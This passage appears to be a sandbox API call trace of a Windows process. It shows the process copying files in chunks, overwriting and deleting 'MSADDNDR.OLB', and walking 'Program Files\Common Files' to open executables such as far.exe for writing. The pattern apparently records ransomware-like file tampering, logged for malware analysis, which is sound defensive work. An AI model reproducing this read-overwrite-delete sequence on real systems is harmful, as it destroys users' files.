[0088.050] GetLastError () returned 0x0 [0088.050] SetLastError (dwErrCode=0x0) [0088.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0088.051] GetLastError () returned 0x0 [0088.051] SetLastError (dwErrCode=0x0) [0088.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0088.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0088.051] ReadFile (in: hFile=0x35c, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0088.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0088.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0088.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0088.055] GetLastError () returned 0x0 [0088.055] SetLastError (dwErrCode=0x0) [0088.055] GetLastError () returned 0x0 [0088.055] SetLastError (dwErrCode=0x0) [0088.056] GetLastError () returned 0x0 [0088.056] SetLastError (dwErrCode=0x0) [0088.056] GetLastError () returned 0x0 [0088.056] SetLastError (dwErrCode=0x0) [0088.056] ReadFile (in: hFile=0x35c, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.056] WriteFile (in: hFile=0x348, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.057] GetLastError () returned 0x0 [0088.057] SetLastError (dwErrCode=0x0) [0088.057] GetLastError () returned 0x0 [0088.057] SetLastError (dwErrCode=0x0) [0088.057] GetLastError () returned 0x0 [0088.057] SetLastError (dwErrCode=0x0) [0088.057] GetLastError () returned 0x0 [0088.057] SetLastError (dwErrCode=0x0) [0088.058] ReadFile (in: hFile=0x35c, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.058] WriteFile (in: hFile=0x348, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.058] GetLastError () returned 0x0 [0088.058] SetLastError (dwErrCode=0x0) [0088.058] GetLastError () returned 0x0 [0088.058] SetLastError (dwErrCode=0x0) [0088.058] GetLastError () returned 0x0 [0088.058] SetLastError (dwErrCode=0x0) [0088.058] GetLastError () returned 0x0 [0088.058] SetLastError (dwErrCode=0x0) [0088.058] ReadFile (in: hFile=0x35c, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0xe70, lpOverlapped=0x0) returned 1 [0088.059] WriteFile (in: hFile=0x348, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.059] GetLastError () returned 0x0 [0088.059] SetLastError (dwErrCode=0x0) [0088.059] GetLastError () returned 0x0 [0088.059] SetLastError (dwErrCode=0x0) [0088.059] GetLastError () returned 0x0 [0088.059] SetLastError (dwErrCode=0x0) [0088.059] ReadFile (in: hFile=0x35c, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0088.059] GetLastError () returned 0x0 [0088.059] SetLastError (dwErrCode=0x0) [0088.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0088.059] WriteFile (in: hFile=0x348, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0xe70, lpOverlapped=0x0) returned 1 [0088.060] GetLastError () returned 0x0 [0088.060] SetLastError (dwErrCode=0x0) [0088.060] GetLastError () returned 0x0 [0088.060] SetLastError (dwErrCode=0x0) [0088.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0088.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0088.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0088.060] CloseHandle (hObject=0x348) returned 1 [0088.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0088.061] CloseHandle (hObject=0x35c) returned 1 [0088.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.062] AreFileApisANSI () returned 1 [0088.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0088.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x469e8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0088.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0088.063] GetFileType (hFile=0x35c) returned 0x1 [0088.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0088.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0088.063] GetLastError () returned 0xb7 [0088.063] SetLastError (dwErrCode=0xb7) [0088.063] WriteFile (in: hFile=0x35c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0088.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0088.064] CloseHandle (hObject=0x35c) returned 1 [0088.065] AreFileApisANSI () returned 1 [0088.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0088.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0088.065] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.066] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x583, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĥ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蔐\x07̧비聐萀\x08賂̧")) returned 0 [0088.066] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0088.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0088.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0088.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0088.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0088.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0088.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0088.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0088.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0088.068] AreFileApisANSI () returned 1 [0088.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\far.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\far.exe", lpUsedDefaultChar=0x0) returned 38 [0088.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0088.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0088.069] AreFileApisANSI () returned 1 [0088.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0088.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d688 [0088.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=38 | out: lpWideCharStr="C:\\Program Files\\Common Files\\far.exe") returned 38 [0088.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\far.exe" (normalized: "c:\\program files\\common files\\far.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0088.069] GetFileType (hFile=0x424) returned 0x1 [0088.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0088.069] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.069] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.069] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.070] CloseHandle (hObject=0x424) returned 1 [0088.070] AreFileApisANSI () returned 1 [0088.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0088.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d370 [0088.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d370, cchWideChar=38 | out: lpWideCharStr="C:\\Program Files\\Common Files\\far.exe") returned 38 [0088.070] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\far.exe" (normalized: "c:\\program files\\common files\\far.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.070] GetLastError () returned 0x20 [0088.070] GetLastError () returned 0x20 [0088.070] SetLastError (dwErrCode=0x20) [0088.070] GetLastError () returned 0x20 [0088.070] SetLastError (dwErrCode=0x20) [0088.070] GetLastError () returned 0x20 [0088.070] SetLastError (dwErrCode=0x20) [0088.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0088.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0088.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.071] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0088.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0088.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0088.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0088.071] AreFileApisANSI () returned 1 [0088.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared", lpUsedDefaultChar=0x0) returned 47 [0088.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0088.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0088.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0088.072] AreFileApisANSI () returned 1 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0088.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared") returned 47 [0088.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared" (normalized: "c:\\program files\\common files\\microsoft shared"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.072] GetLastError () returned 0x5 [0088.072] GetLastError () returned 0x5 [0088.072] SetLastError (dwErrCode=0x5) [0088.072] GetLastError () returned 0x5 [0088.072] SetLastError (dwErrCode=0x5) [0088.072] GetLastError () returned 0x5 [0088.072] SetLastError (dwErrCode=0x5) [0088.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0088.072] AreFileApisANSI () returned 1 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0088.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared") returned 47 [0088.073] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared" (normalized: "c:\\program files\\common files\\microsoft shared"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.073] GetLastError () returned 0x5 [0088.073] GetLastError () returned 0x5 [0088.073] SetLastError (dwErrCode=0x5) [0088.073] GetLastError () returned 0x5 [0088.073] SetLastError (dwErrCode=0x5) [0088.073] GetLastError () returned 0x5 [0088.073] SetLastError (dwErrCode=0x5) [0088.073] HeapFree (in: hHeap=0x20000, 